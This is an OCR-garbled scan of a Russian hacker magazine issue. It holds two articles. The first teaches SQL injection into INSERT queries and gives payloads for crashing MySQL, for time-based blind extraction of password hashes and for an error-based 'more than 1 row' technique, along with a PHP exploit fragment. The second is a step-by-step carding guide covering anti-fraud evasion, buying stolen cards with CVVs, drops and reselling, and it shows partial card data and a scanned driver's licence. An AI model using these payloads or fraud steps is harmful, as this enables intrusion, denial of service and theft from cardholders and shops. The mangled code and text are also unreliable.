' ипсІегѵгііаЕег ' , ' ЕезЕепд ' , 'де@та.ги' , 

' [ЗОЬ] ') 

ІЫЗЕРТ ІЫТО 'изегз' ( 'паше' , 'раззѵгогсі' 

, 'ешаіі' , ' ірасісігезз ' ) ѴАШЕЗ ( 

' ипсІегѵгііаЕег ' , 'ЕезЕепд ' , 'де@та.ги' , ' [ 
127.0.0.1') ОЫ ШРЫСАТЕ КЕУ БРБАТЕ ЕаЫе2 . 
асЗшіп_разз = ' ипйегШАТ? ! '/* ] ' ) 

^ МОДИФИКАЦИЯ ДАННЫХ 
С ВОЗМОЖНОСТЬЮ ПРОСМОТРА РЕЗУЛЬТАТА 

Здесь уже не важно, где инъекция — в имени таблицы 
или столбца. Мы можем увидеть результат выполнения 
запроса, пускай и косвенно. А значит провести атаку не 
проблема — возникнут лишьтехнические особенности 
выяснения результата. Пример: пусть веб-приложение 
ведет публичную статистику посещений и есть уязвимость 
в столбце с БІзег-АдепБ Тогда результат выполнения 50Б- 
іщесБоп мы можем наблюдать на паге вывода статистики 
посещаемости. 



ІЫЗЕРТ ІЫТО ЕаЫе ѴАШЕЗ 

( ' апбісБаЕ ' , 'ШѴГ , ' РНР' , [ЗОБ іп Бзег-Адепб] 

, ' ХЗЗ ' ) ; 

ІЫЗЕРТ ІЫТО ЕаЫе ѴАШЕЗ 

( ' апбісЬ.аЕ ' , ' ШМ ' , ' РНР ' , [ ( зеіесб сопсаЕ (из 
ег , 0x3 а .раззѵгогсі, 0x3а, Еі1е_ргіѵ) ігош шузді . 
изег ІітіЕ 0 , 1 ) , 'Баскесі!') /* ] , 'ХЗЗ'); 

^ 005-АТАКА 

Думаю, кому и зачем это бывает нужно — особые комментарии 
не требуются. 

Если инъекция возможна еще и через_Р05Т или_С00КІЕ, 
то админ пройдет все круги ада в попытках узнать, с чего это 
вдруг мускул вешает систему. 

1. Для йоЗ можно использовать функцию измерения произ- 
водительности — ВепсЬтагк(Ы,Р), которая будет вызывать 
Ы-раз ресурсоемкую Е-функцию, например тсі5(]. 

ІЫЗЕРТ ІЫТО ЕаЫе ѴАШЕЗ ( ' апЕісБаЕ ' , 

’Ш' , 'РНР',' [ЗОБ] ' , ' ХЗЗ ' ) ; 

ІЫЗЕРТ ІЫТО ЕаЫе ѴАШЕЗ ( ' апЕісБаЕ ' , 

' Ш ' , ' РНР ' , ' [ 'ОН ВЕЫСНМАНК ( 

10000000, ВЕЫСНМАНК (1000000 0, Ш(і5 (поте() ) ) ) , 
'БІЕ! ' ) /* ] ' , 'ХЗЗ' ) ; 

2. Или использовать специфические ошибки СУБД. 
Приложения: Му50Е4.1. МуЗОБ 5ДМу50Б5.1 (15.06.2006). 
Запрос «зеіесі 5Іг_Іо_сІа1:е( 1 , N 11 ББ );» напрочь роняет мускул. 

ІЫЗЕНТ ІЫТО ЕаЫе ѴАШЕЗ ( 'апЕісБаЕ ' , 'Ш' , 
'РНР' , ' [ЗОБ] ' , 'ХЗЗ' ) ; 

ІЫЗЕНТ ІЫТО ЕаЫе ѴАББЕЗ ( 'апЕісБаЕ ' , 'Ш' , 
'РНР' , ' [ ' ОН 1=(зе1есб зЕг_Ео_с!аЕе ( 1, ЫБББ 
) ) , ’БІЕ! ' ) /* ] ' , 7 ХЗЗ ' ) ; 

^ РАЗДЕЛ ЕНИЕ ЗАПРОСОВ В М550Ц 
Р05Т0РЕ50Б, ОРАСБЕ 

Что же объединяет эти три популярные СУБД? Такая замеча- 
тельная вещь, как поддержка разделения запросов — исполь- 
зуя точку с запятой, перевод каретки и прочее. Таким образом, 
мы можем добавить абсолютно любой ЗОБ-запрос, отделив 
его «;» от основного. Возможности тут открываются действи- 
тельно широкие. 

Во имя профилактики копипаста не стану в сотый раз писать 
про взлом МЗЗОБ. Это уже не раз обсуждалось на страницах 
журнала. 

В ИСПОЛЬЗОВАНИЕ ВРЕМЕННЫХ ЗАДЕРЖЕК. 

Для МуЗОБ — это операторы ЬепсЬтагкО, для РозІдгеЗОБ — 
рд_5Іеер(), а для МвЗОБ он единственный — беІауО. Примене- 
ние временных задержекэто своего рода переход ко второму 
измерению. От измерения разности получаемой информации 



> ІП^О 

Естественно, почти 
во всех использо- 
ванных примерах 
вместо ІЫЗЕРТ 
может стоять любой 
другой оператор, в 
том числе и 5ЕЕЕСТ, 
ведь с ним тоже 
бывают сложные 
случаи инъекций. 
Подзапросам все 
равно, где их ис- 
пользуют, на то они и 
подзапросы! 



Особенности «тоге 
Ібап 1 гоѵѵ»: 

1 . стандартная ско- 
рость посимвольно- 
го брута при полной 
заменяемости 
бенчмарка. Важно, 
так какэкономим 
время и не грузим 
сервер; 

2. цена этой про- 
изводительности 
— масса ерроров 

в логах МуЗОБ, что 
может привлечь 
внимание админист- 
ратора; 

3. разумеется, «тоге 
іЬап 1 гоѵѵ» возмо- 
жен лишь в конфи- 
гурации сервера с 
сІІ5рІау_еггог5=0Ы 
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Обязательно посети 
эти сайты, если 
интересуешься 
безопасностью 501- 
баз данных: 
іпіесііоп.гиіегг.ги 
ѵѵѵѵѵѵ.зді.ги/агіісіез 

Неплохой багтрак 
функционирует на 
форуме античата: 



кизмерению разности времени на выполнение запроса. Все 
это позволяет по времени ответа сервера определить резуль- 
татвыполнения запроса. 

ШЗЕКТ ШТО СаЫе ѴАШЕЗ ( ’ апЦісЬаС ' , 'Ш' , 
'РНР' , ' [ЗОЬ] ' , ’ХЗЗ' ) ; 

Этотзапрос будет положителен для ІР и на исполнение 
бенчмарка потребуется время, потому ответ от сервера придет 
с задержкой: 

ШЗЕКТ ШТО каЫе ѴАШЕЗ ( ' апЦісЬаС ' , 'Ш' , 
'РНР',' [ ' ОК. 1=іі (азсіі (Іомег (зиЬзбгіпд ( ( 
зеіеск изег ігот тузді .изег ІітіЬ 
1 ) ,1,1) ) ) >= 1 , ЬепсЬшагк (999999, тс15 ( поѵ? ( ) ) ) , 

1) , ' ЬаскесП ' ) /* ] ' , 'ХЗЗ' ) ; 

А этот — отрицателен и ответ от сервера придет сразу же: 



4. Параметр измерения производительности (то есть коли- 
чество итераций) в нашем примере — 999999: 

ЬепсЬшагк (999999 ,тс!5 (изег ( ) ) 

По личному опыту знаю, что это число с момента написания 
статьи 1 сК.ѵѵОІГом вместе с ростом производительности сер- 
веров изменилось почти на порядок. В эксплойте желательно 
делать автоподстройку этого параметра, добиваясь приемле- 
мого времени ответа. 

5. Подобрав Ы-число в ЬепсЬтагк’е, нужно задатьтаймаут 
ответа — Іітеоиі: 

Это будетсреднее арифметическое от времени выполнения 
ІгиеДаІзе запроса. 

6. При написании эксплойта необходимо учитывать, что, по 
статистике, общее число «неверных» запросов превышает 
общее число «верных», а значит нужно поставить бенчмарк- 
задержку, чтобы она срабатывала при верном ответе. Вот 




іогшп.апЯсІіаі.ги 



так: 




>сіѵсі 

На нашем диске мы 
выложили суповой 
набор из 15 лучших 
5СП_-сканеров по 
версии 




> ѵѵагпіпд 

Внимание! Инфор- 
мация представлена 
исключительно с це- 
лью ознакомления! 
Ни автор, ни редак- 
ция за твои действия 
ответственности не 
несет! 



ШЗЕКТ ШТО ЬаЫе ѴАШЕЗ ( ' апЫсЬаЬ ' , 'Ш' , ' Р 
НР' , ' [ ' ОК 1=іб (азсіі (Ісжег (зиЬзЬгіпд ( (зеіе 
сЬ изег ігош шузді .изег ІішіЬ 1) , 1 , 1) ) ) >=254 ,Ь 
епсЬшагк ( 999999 ,шЬ5 (поѵ/( ))), 1) , 'ЬаскесП' )/* 
] ' , 'ХЗЗ' ) ? 

Н ВЕЫСНМАВК ДЛЯ ХАКЕРА 

Если сомневаешься, что подбенчмарквообще пишутэкс- 
плойты, пробегись по багтракам и убедись в обратном — они 
существуют. 

В реализации на бенчмарке эксплойт выглядит немного слож- 
нее, чем для обычного слепого посимвольного брута. 
Перечислим особенности ЬепсЬтагк: 

1. Бенчмарксоздаетсерьезную нагрузку на процессор сер- 
вера. Причем эта нагрузка во время работы эксплойта длится 
практически постоянно. Администратор может не смотреть 
логи обращений/ошибок, но вполне может поинтересоваться, 
почему сервер притормаживает и почему в Іор -> Р«ту5рІсІ» 
занимаетпервое место... 

2. Время работы эксплойта тем больше, чем большую длину 
записи мы хотим получить (прямо пропорционально). Как 
показываетпрактика, для перебора 32-х символьного хеша 
уходит больше часа. Иногда — несколько часов (по обстоя- 
тельствам). 

3. Взломщику и серверутребуется широкий надежный канал. 
От него зависит качество и стабильность брута. Я не говорю, 
что на диалапе у тебя ничего не получится. Но глюков будет 
больше, особенно если ты с целью экономии времени выбе- 
решь слишком маленький параметр. 



іі ( ? , Сгие , іаізе ) 

1 = іі ( 1=1 , ЬепсЬшагк (999999 ,шЬ5 (изег ( ) ) , 1 ) 

Тем самым мы сэкономим время и снизим нагрузку на сервер. 
7. Не забывай, что серверу необходимо давать отдых после 
каждого бенчмарка, так сказать, дать восстановиться. Иначе 
следующий запрос может иметь непредвиденное время 
выполнения и выдастошибочные данные (превыситпогреш- 
ность и случайность ошибок/форсмажора). 

Об этой маленькой детали часто забывают, поскольку либо 
тестят двиглокально, либо неясно о чем думают, релизя код 
без предварительного тестирования. 

Сам долго удивлялся, не понимая, почему первый символ 
брутится правильно, но дальше идетмусор — а сервер просто 
давился бенчмарком. 

Желательно выбирать время задержки в 1 -1 ,5 раза больше, 
чем время исполнения бенчмарка. Да, это существенно 
замедлит брут, но обеспечит качество результата. 

Если обратиться непосредственно к коду, то символьный бру- 
тер ІсК.ѵѵОІГа без труда модифицируется с учетом бенчмарка. 
Для его работы необходимо: 

1. Изменить 5СН_ под бенчмарк. 

$ЬЬЬр_диегу = $раЫі. " ?СаЬ=&раде=1&1іке= " . $из 
егпаше." ' АМБ 1=іб (азсіі ( зиЬзбгіпд (СОЫСАТ (Ь 
_ЬодіпМаше,СНАЕ(58) ,11 _РаззѵгогсІ) , " .$з_пит. " 

, 1) ) " . $ссЬеск. " , ЬепсЬшагк (999999 ,тЬ5 (изег ( ) 

) , 1 )/*"; 
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^Фрагмент моего эксплоита для МуВВ, работающего 
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подстановки неверных имен таблиц/столбцов/типов данных: 
зеіесб іб (1=1 ,пи11 ,Ыаааа1і) ; 
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3. После каждого іхие-запроса, а значит пытки бенчмарком, дадим серверу 
отдохнуть N секунд. Пусть восстановится — зіеері). 

^ АЛЬТЕРНАТИВА ВЕЫСНМАВК’Ѵ 

Когда я копался с бенчмарком, меня, как и любого из вас, одолевало жела- 
ние найти заменуэтому геморройному способу. И замена была найдена! 
Разность выводимой инфы и времени — на самом деле не единственные 
факторы. Давай вернемся чуть назад и вспомним, 
с чего начинается любая ЗОБ-инъекция? 

Конечно, с кавычки в запросе! И вывода сооб- 
щения об ошибке, соответственно. 

Если подходить логически — мы ставим ка- 
вычку, МуЗОБ проверяет запрос, находит в нем 
ошибку и сообщает нам. Следи за мыслью: мус- 
кул сначала проверяет на корректность, затем 
либо проводит запрос и выводит результат, либо 
не проводит и выдает сразу ошибку синтаксиса. 

Атеперь спросим себя — можетли быть иначе? 

Возможно ли и запрос выполнить, и ошибку 
получить? Разумеется, да, в этом-то все и дело! 

Может возникнуть ситуация, когда запрос прой- 
дет проверку на корректность, потом выполнит- 
ся, но результат даст нам сообщение об ошибке. 

Тогда наша задача сводится к созданию такого 
запроса плюс необходимости связать пара- 
метры в нем таким образом, чтобы мы могли 
манипулировать результатом и, соответственно, 
получать полезные данные. 

Итак, ставим задачу: срыв запроса неявным 
условием и, как следствие, намеренный вызов 
ошибки, которая и поможет отличить Ігие от 
Мзе циегу. 

Вспомнив различные ошибки БД, сначала я 
попытался, используя іф сорвать запрос путем 



«Возможно ли и за- 
прос выполнить, и 
ошибку получить? 



этом-то все и дело! 



ожет возникнуть 



ситуация, когда за- 
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Однако МуЗОБ, сцуко, умный и проверяеттип данных перед выполнением 
на корректность («Ѵои Иаѵе ап еггогіпуоигЗОБзупІах»). 

Попытка изменять имя не столбца, а таблицы также не увенчалась 
успехом. 

зеіесб гшіі бгот іб (1=1 ,изегз ,Ыаааа1і) ; 

Видимо, алгоритм интерпретирования запроса в мускуле на корректность 
предполагает имя таблицы вроде константы, а здесь она не задана явно. 
Проверяется существование столбца в заведомо известной таблице и, 
если таблица не определена, то МуЗОБ шлет 
меня подальше. 

Принцип проверки в других базах данных 
я не смотрел, так что, возможно, такие про- 
стые, а, главное, универсальные трюки там 
прокатят. 

Истина где-то рядом... — даже дяде Малдеру 
такое не снилось! Какие еще ошибки могут воз- 
никнуть при выполнении запроса? 

1 . «ТЬе изесі 5ЕБЕСТ зіаіетепіз Ьаѵе а сШегепІ 
питЬего^ соіитпэ» — является, пожалуй, самой 
популярной ошибкой после «Ѵои баѵеап еггог 
іп уоигЗОБзупіах». Но здесь проверка также 
происходит до выполнения запроса. 

2. «Орегапб збоиісі сопіаіп 1 соІитпЫ» — нельзя 
применить потойже причине. 

3. «ѵѵагпіпд: ту5д[_і : е1:сЬ_аггау...» — можно 
применять, но рЬр-ошибка специфическая, под 
конкретный движок. 

4. «5иЬциегу геіигпз тогеібап 1 гоѵѵ» — да-да, он I 
самый, вездесущий лимит. Бинго! Вотто, что нам 
нужно! Здесь МуЗОБ проверяет корректность 
данных, но не может проверить число возвра- 
щаемых ответов, не сделав самого запроса. 
Появляется новая задача, — какспровоцировать I 
подобную ошибку? Для этого требуется создать 
два условия: 
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ІАтака «тоге_1_гоѵѵ», используя АпбсЬаИооІкЖ 



іііооікі у^ 




> СІѴСІ 

На диске ты найдешь 
мою шпаргалку для 
50І_-хеккера. С ней 
не придется каждый 
раз опять копаться в 
манах. Рассмотрены 
особенности Му5СП_, 
М55СІЦ РозІдгеЗОЦ 
Огасіе, пп5СП_, 

БСИ-ііе, Ассезз инъ- 
екций. 

Также на йѴй 
выложена новая 
версия АпбсЬа! 5С1І_- 
Іооікіі; с поддержкой 
«тоге_1_гоѵѵ» и 
бенчмарка! 



1 . когда ошибка возникнет на 1 00%; 

2. когда Еггог не возникнет вообще. 

Предположим, что нам заведомо известны имена таблиц и 
столбцов вуязвимом приложении. Пусть парольхеширу- 
ется алгоритмом тсІ5. Тогда длина любого пароля равна 32 
символам. Адлина ісі или логина наверняка будетменьше, не 
правда ли? 

ІепдЫі(ісІ) = (1-5 . . ) и ІепдкЪ. (раззѵгогсі) = (32 ) 

Наш эксплоит будет выглядеть следующим образом: 
іаізе : 

ШЗЕКТ ШТО ІаЫе ѴАШЕЗ ( ' апкіскаі: ' , 'Ш' , 1 Р 
НР’ , 1 [ 123’ ОК 1=(зе1есЬ пиіі ігот изегз ѵѵкеге 
1епдЫі(іТ (азсіі (зиЪзкгіпд ( (зеіесб раззѵгогсі 
Тгош изегз ѵѵкеге иі<і=1) ,1,1) ) >254 ,раззѵѵогс!,иі 
б)) >5) , 1 каскеб ! ’ ) / * ] ' ,'ХЗЗѵ'); 

Первый символ пароля наверняка меньше чем азсіі(254). 
Значит, Т возвратит ІепдіЬ(іс!)>5, атак кактакого числа пользова- 
телей скорее всего, нет (циферку здесь можно и побольше брать), 
тозеіесі однозначно возвратит І\ІІЛ_І_. В результате мы ничего не 
увидим, будто и нетникакой инъекции. Вот нам и второеусловие! 

Ьгие : 

ШЗЕКТ ШТО ІаЫе ѴАШЕЗ ( ' апкіскак ' , ’Ш' , ' Р 
НР' , ' [ 123' ОК 1=(зе1еск пиіі Тгош изегз ѵѵкеге 
1епдЫі(іТ (азсіі (зиЬзЬгіпд ( (зеіесб раззѵтогб 
Тгош изегз ѵѵке ге иіб=1) , 1 , 1) ) >1 ,раззѵгогб,иіб) 

) >5 ) , ' 'каскеб! ' ) /* ] ' ,'ХЗЗ'); 
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Но в условии может быть сравнен только один результат 1 =(*), 
что спровоцируетошибку «ЗиЬциегу геіигпз тоге Ікап 1 гоѵѵ»! 
Пообщавшись на форуме, мы усилиями группового разума 
(респекттоварищу робказбеу’ю] родили универсальный, а 
главное, простой вариантэксплойта: 

(зеіеск 1 ипіоп зеІесС 2) 

ШЗЕКТ ШТО баЫе ѴАШЕЗ ( ' апкіскак ' , Ш 
Ш' , ' РНР 1 , ' [ 123 ' ОК 1=і1 (азсіі (зиЬзб 
гіпд( (зеІесЬ раззѵгогб ігогп изегз ѵѵкеге 
иіб=1) ,1,1) ) >1 , (зеіеск 1 ипіоп зеіеск 2) , 1) , 

' 'каскеб! ' ) /* ] ' , 'ХЗЗ' ) ; 

ШЗЕКТ ШТО ІаЫе ѴАШЕЗ ( ' апСіскаЪ ' , Ш 
Ш' , ' РНР ' , ' [ 123 ' ОК 1=ііі (азсіі (зиЪзк 
гіпд( (зеіесб раззѵгогб ігогп изегз ѵбіеге 
иіб-1) ,1,1) ) >254 , (зеіеск 1 ипіоп зеіесь 2 ) , 1 ) 

, 'каскеб! ' ) /* ] ' , 'ХЗЗ' ) ? 

^ АЙС? 

Дело втом, что при Іаізе запросе левая запись будет добавле- 
на в БД. Но это не очень хорошо (потому что палево). Остается 
найти вторую подобную ошибку, и у нас уже будут два уникаль- 
ных ответа сервера. 

В настоящий момент мне известна только ошибка «Соіитп 
'[соіитп]' саппоі: Ье пиіі», возникающая при попытке присво- 
ить N11 1_1_ столбцу с атрибутом ІМОТ N1100. 



ш 



ШЗЕКТ ШТО баЫе ( 'а' 
(1=1,ШЬЬ, ' 2 ' ) , ' 3 1 ) 



' с ' ) ѴАШЕЗ ( ' 1 ' ,іі 



Поскольку первый символ пароля наверняка больше азсііП), 
то условие истинно. 

Значит, \і возвратит ІепдіЬ (разгѵѵогсі) > 5, что приведет к выводу 
N результатов в зеіескзапросе. 



Уверен, что, порывшись в этом направлении, ты найдешь и 
другие схожие ошибки, проявляющиеся именно после вы- 
полнения ОІІЕПѴ. Ая прощаюсьстобой, честно описав то, что 
планировал! 31 



Пример запроса «ЗиЬдиегу геШгп5 тоге Ікап 1 гоѵѵ» изтерминала 
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ВЕЩЕВУХАВ НАШИ ДНИ 



Ты никогда не задумывался о происхождении «серых» товаров? 

Нет, сейчас я говорю не о польском мясе или китайских мобильниках, 
а имею в виду качественную буржуйскую электронику. Наверняка, ты не 
раз натыкался на крупных андеграунд-форумах на мессаги с предложения- 
ми продажи новеньких ноутов и прочих высокотехнологичных девайсов. 
Первый вопрос, возникающий в подобном случае — «Откуда дровишки?». 



Н ЧТО ТАКОЕ 5ТЦРР 

Как водится, прежде чем приступать к активным боевым действиям, 
следует ознакомиться с рассматриваемым вопросом. С этого мы и начнем. 
Если ты не первый день вращаешься на раскрученных кардинг-порталах, 
то можешь смело пропускать сей абзац и переходить к пункту намбер два. 
Ежели нет — читай и вникай. Зіий (или, как говорят кардеры, «вещевуха») 
представляет собой одно из распространенных направлений в кардинг- 
сфере. Суть его заключается в закупке различного барахла на просторах 
сети за счет чужих кредитных карт. Отовариваются, как правило, в буржуй- 
ских интернет-шопах, расплачиваясь кредитками самихже буржуев. На 
первый взгляд, схема кажется предельно простой: взял картонку, зашел на 
сайт шопа, вбил данные кардхолдера (владельца карты) и указал адрес для 
доставки. Однако основные проблемы начинают возникать именно здесь 
(вспомни героя из фильма «Хоттабыч», который скардил кувшин с аукциона 
иуспешно приобрел два вагона геморроя). В конце 90-х — начале 2000-х 
дела обстояли великолепно: зарубежные магазины охотно высылали по- 
сылки в Ру/СНГ, принимая к оплате любые валидные картонки. Но времена 
меняются, а вместе с ними меняются и методы работы. Каждый второй, 
кто, так или иначе, связан с криминальным кард-бизом в Сети, пробовал 
себя на поприще вещевухи. Тем не менее, освоиться и удержаться на плаву 
удалось далеко не всем. Посему ниже я подробно расскажу тебе о тонкостях 
и нюансахтакого нелегкого ремесла, какЗіиН. 



0 ИДЕМ НАДЕЛО 

Ну что, ты уже судорожно прикидываешь количество возможного 
дохода в ѴѴМ 2-эквиваленте? Неспеши, перед тем, как начать за- 
тяжную лекцию по теме вещевого кардинга, хочу предупредить: все 
действия, описанные в статье, противозаконны, а значит, никакого 
отношения к ним ни я, ни редакция журнала — не имеем. Поэтому, 
если ты живешь сытно и нуждаешься лишь в свеженькой модели 
«Инфинити», будь добр, переверни страничку и не создавай себе 
проблем. 

Как известно, начинать лучше всего с плана, ибо последова- 
тельное структурирование действий способно существенно об- 
легчитьлюбую работу. План, расписанный ниже, не претендует 
на гениальность, зато полностью оправдывает свою функцио- 
нальность: 

1. Подготовка для работы штатной ОС (обязательно М3 

Міпскжз ) 

2 . Приобретение материала (сс/епгоіі/зоскз/ѵрп) 

3. Выбор шопов (естественно, забугорных) 

4 . Поиск дропов (в зависимости от выбранных шопов) 

5 . Продажа товара (скупщикам в Сети, либо собственноруч- 
ная растаможка и продажа в реале) 
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Приступим. Согласно первому пункту, следует подготовить 
Винду к вбиву. Что такое вбив и с чем его едят, объяснялось 
в предыдущих номерахжурнала, поэтому подробно останав- 
ливаться на самом процессе не будем. Коротко поясню, что и 
как следует изменить хакеру в ОС, чтобы информация о ней 
не вызывала подозренийу антифрод систем. Первое, что по- 
требуется — заинсталить английскую версию ѴѴіпХР на всеми 
любимый ѴМѴѴаге. Так приобретают ось с дефолтовым ЕЫ -115 
языком, предназначенную исключительно для «грязных» дел. 
Затем время либо синхронизируют в соответствии с регионом 
кардхолдера (в случае, если материал уже на руках), либо 
выставляют часы по Центральной Америке. Для смены/ре- 
дактирования подобных параметров (часовой пояс/язык 
системы/еіс) существуетспециальный софт, например, Кагба 
Тооіб. На данном этапе основные заголовки должны иметь 
следующий вид: 

Зузбеш Іапдиаде : еп-из 

Вгсжзег'з ігЩегбасе Іапдиаде: еп-из 

Швег Іапдиаде: еп-из 

Теперьзаймемся непосредственно самой Виндой. Аименно 
— серийником операционки. Поменятьего можно вручную, 
для этого нужно создать файлик с названием зегіаі.гед и вбить 
туда: 

[ НКЕУ_ЬОС АЬ_МАСНШЕ \ ЗОЕТМАКЕ \Мі с г о зо б I: \ 
Мп(бомз\СиггепбѴегзіоп] 

" РгосІисСІсІ" = "62894-241-7090775-23 885" 

[ НКЕУ_ЬОС АЬ_МАСНШЕ \ ЗОЕТМАКЕ \Мі с г о 30 1 Ь \ 
Міпсіомз ШЧСиггепкѴегзіоп] 

" РгосІисЕІсІ"^" 62894-241-7090775-23885" 

Где "62894-241-7090775-23885" — новый уни- 
кальный номер Винды. После запуска зегіаі . 
гед опускаем виртуальную ось в ребут и плавно 
переходим к пункту намбер 2 . 

Закупка материала — очень важный и ответственный процесс, 
здесь главное не лохануться и не потратить деньги зря. 
Первое, что потребуется хакеру для обеспечения собственной 
безопасности — это качественный ѴРЫ-сервис. Из наиболее 
стабильных и надежных рекомендуется ѵѵѵѵѵѵ.орепѵрп.ги. Тут 



сервера и в Европе, и в Азии, и в Штатах, причем средняя цена 
аккаунта составляет всего около $60 в месяц (спокойный сон 
того стоит, правда?). Также понадобятся соксы, много и с ши- 
роким географическим диапазоном. Регион выбранного сокса 
всегда должен совпадать с официальным местоположением 
кардхолдера, иначе будут траблы. Поэтому, если кто-то со- 
брался обуватьамериканские шопы, то следует обратить вни- 
мание на сервисы типа ѵѵѵѵѵѵ.зоскзб.пеЕ Ежемесячная цена 
акка колеблется от $20 до $60, в зависимости от выбранного 
тарифного плана. С ѴРЫ/5оскз вроде разобрались, теперь 
пара слов о картонках. Понадобятся два типа карт — обычные 
карточки с цвв-кодом и епгоіі. Принципиальное отличие 
второго от первого заключается в возможности управления 
информацией кардхолдера (например, можно самостоятельно 
изменить адрес владельца карты и ничего не подозревающий 
шоп вышлетна него товар). Воттолько цена енролла значи- 
тельно выше цены обычной картонки с цвв-кодом. Поэтому, 
если денег на первых парах катастрофически не хватает, 
можно обойтись без епгоІГа, но об этом чуть позже. Итак, какие 
данные кардхолдера нас интересуют прежде всего: 

1 . Имя 

2 . Адрес 

3. Штат / 2 ір- код /Страна 

4 . Телефон 

5 . Номер кредитной карты/ срок окончания дейст- 
вия кредитной карты 

6 . Защитный код (ака цвв) — 3/4 символа. 

За примером далеко ходить не надо: 

1. Мгз. ЛИ Мід***** 

2 . 5400 М. д********* 

3. Ш/47885/ШЗ 

4 . 1(812)240-6*** 

5 . Ѵіза - 4479234000****** / 11.2009 

6 . 476 

Стоит подобный материал в пределах $1 -2 за штуку. Для 
начала потребуется около 20 картонок. Выбирать их хакеру 
следует исходя из расположения потенциальных объектов 
будущей деятельности (в 115 покатят любые типы карт — Ѵіза/ 
МазІегСагсІ/АМЕХ/Оізсоѵегу, а вот в ЕЙ лучше юзать Ѵіза/ 
МазІегСагсІ). На первый раз имеетсмысл взять 10 картонок по 
1)5 и столько же по ЕІ), со временем станет ясно, что больше 
подходит. 

Теперь приступим к выбору шопов, в которых кардеры отова- 
риваются по самое «не хочу». Сразу скажу, что дело сложное, 
нервное и долгое. Найти стабильный, шлющий товар шоп 
— большая удача, выраженная в денежном эквиваленте. 
Естественно, чтобы определить работоспособность магазина, 
придется попробовать покардить в нем стафф, но на первом 
этапе достаточно грамотно отсортировать с десяток линков. 

Не стоит гнаться за крупными, раскрученными порталами, 
как правило, все они имеют мощные антифрод-системы, с 
которыми тягаться новичку пока еще рановато. Здесь кардеры 
ищут интернет-магазины, торгующие электроникой (ноуты/ 
фотики/комплектующие) и отсылающиетовары в ЕІ5/ЕЕ). Есть 
одна важная деталь: так какэнролла у нас нети вбиваются 
обычные картонки, то адрес кардхолдера и адрес для доставки 




> ѵѵагпіпд 

Внимание! Инфор- 
мация представлена 



исключительно с 
целью ознакомле- 
ния! Ни автор, ни 
редакция за твои 
действия ответст- 
венности не несет! 







> іггіо 

Не стоит гоняться за 
крупными, раскру- 
ченными шопами. 
Как правило, они 
имеют мощные анти- 
фрод-системы! 

Всегда аккуратно 
подходи к работе, не 
забывай шифровать 
всю информацию на 
винте и чиститьлоги 
браузера/аси после 
рабочего дня. 
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Надежный ѴРЫ -сервис 



будет отличаться, поэтому выбирать надо шопы, 
позволяющие слать покупки в качестве подарка. 

Подарок, конечноже, получит дроп, однако 
владельцы магаза вряд ли что-либо заподозрят. 

Подобная схема успешно работает в странах ЕС и 
пользуется популярностью среди стафферов. 

Отобрав несколько подходящих шопов, следует 
подумать, собственно, о дропах — людях, со- 
гласных принять карженный товар в странах, по 
которым рассылает покупки магазин. Самому 
заморачиваться поиском дропов — сущий гемор- 
рой, но можно обратиться к дроповодам — людям, 
вербующим дропов и предоставляющих их 
под прием товаров/банковских переводов/еіе. 

Обычно дроповоды работа ютза %, но тут уж как 
договоришься. Кстати, пункт выбора дропов тес- 
но связан с продажей карженного стаффа. Дело 
втом, что зачастую скупщики сами предлагают 
хакерам дропов, на которых и кардится стафф, — а 
хакеру перепадает 30-40% от реальной стоимости 
товара. Это лучший вариант для начинающего, 
так как растаможку и сбыт стаффа на первых этапах осилить маловероятно. 
Но вот все готово: ты затарился картонками, купил впн/соксы, договорился 
со скупщиком. С широченнойулыбкой на лице регешься на понравившемся 
шопе, вбиваешьданные кардхолдера, указываешь адрес дропа для доставки 
(якобы подарка) и жмешь «епіег». Что же способно омрачить радость? Во- 



первых, шоп можетзапроситьскан кредитки или 
даже паспорта, а во-вторых, зачастую требуется зво- 
нок в магазин для подтверждения заказа. Ксчастью, 
на кардинг-рынке весь спектр услуг предоставляется 
в полном объеме, поэтому с поиском рисовальщика 
сканов и прозвонщика проблем возникнуть не долж- 
но (за исключением дополнительной траты средств). 
Тем не менее, остается ряд угроз, которые всегда и 
везде будут сопровождать то го, кто рискнет встать на 
кривую дорожку кардинга. 

г лирика 

Какты понимаешь, вжизни за все нужно платить. 
Поэтому, если кардинг — твой выбор, основными 
проблемами для тебя станут: 

а) кидалы 

б) люди в погонах. 

Причем, если от первых можно хоть как-то защи- 
титься, то со вторыми все обстоит гораздо сложнее. 
Если пользоваться услугами только проверенных 
сервисов, избегать лишних «засветов» на кард-фо- 
румах и вести все дела только в Сети, возможно, это продлит твое пребыва- 
ние на свободе. Но всегда надейся и жди. Поверь, если ждать — за тобой 
обязательно придут. Кстати, если не ждать, то тоже придут, но неожиданно, 
а это намного хуже. В общем, ты меня понял, будь готов ко всему. А лучше не 
ввязывайся в это грязное дело. ЗЕ 



Причем, если от 
первых можно хоть 
как-то защититься, 



гк^ытюыш^зсеШ 
Кразд^Зюжне^Ш - ■ 



ІШАА 



.ісг чі и Миен <■* ~і'і і я» ^ 

ОРІѴЕП Жі 



шаил чіімГ 

V ЩіАА »Я*М 

Дѵйдндм «ям 

1 ѴѴЕ5ТБДНК ПОДО АРТ ИГЕ 

ыёѵУ гййк. от іо « 

От 



іЛСЕ ОТ ИГ Н Ш 
ЕЯ » Гт. ві 
■ЛЕС 



1-11 



ІА.-.ЧВ 



Скан американского водительского удостоверения 




► 064 



ХАКЕР 03 /111/ 08 







Перченое утро 
от ЕМЕПОѴ 104.2 РМ 



В утреннем эфире радиостанции ЕИЕЯОѴ 
104 2 РМ (НОД появилось необычное трио - 
веселая брюнетка Морозова, сексуальная 
блондинка Абитаева и звезда ночных клубов - 
горячий МС и знаменитый диджей Саймон Идея 
шоу «ВІАСК2ѴѴНІТЕ» принадлежит Морозовой и 
Абит зевой 

Задумав свое шоу как «Утро с черным перцем! ». 
девушки в поисках приправы пришли в 
стриптиз-клуб (что с ними случается, как клянутся, 
редко) и, увидев симпатичного темнокожего диджея, 
прямо тут же решили, что ом и станет их «черным 
перцем» Осталось проверить новобранца на 
устойчивость к стрессам и креатив-ость, 

• Я тогда просто обалдел от их напора: одна такая 
стопроцентная блондинка, другая - с огненными 
рожками на темных волосах! - вспоминает Саймон 

• И просят меня танцевать, представляешь?! Я им 
говорю, девушки, это же не мой зіуіе* 

• А мы ему показали всю свою зарплату, и он выдал 
такой &ігір-(еа$е! - смеется Морозова - Но это был 
первый и последний раз. когда Саймон разделся за 
пультом ... 

• Тогда и предложили ему вместе работать - нам 
как раз не хватало такого раскрепощенного «перчика» для шоу. • томно шепчет Абитаева 

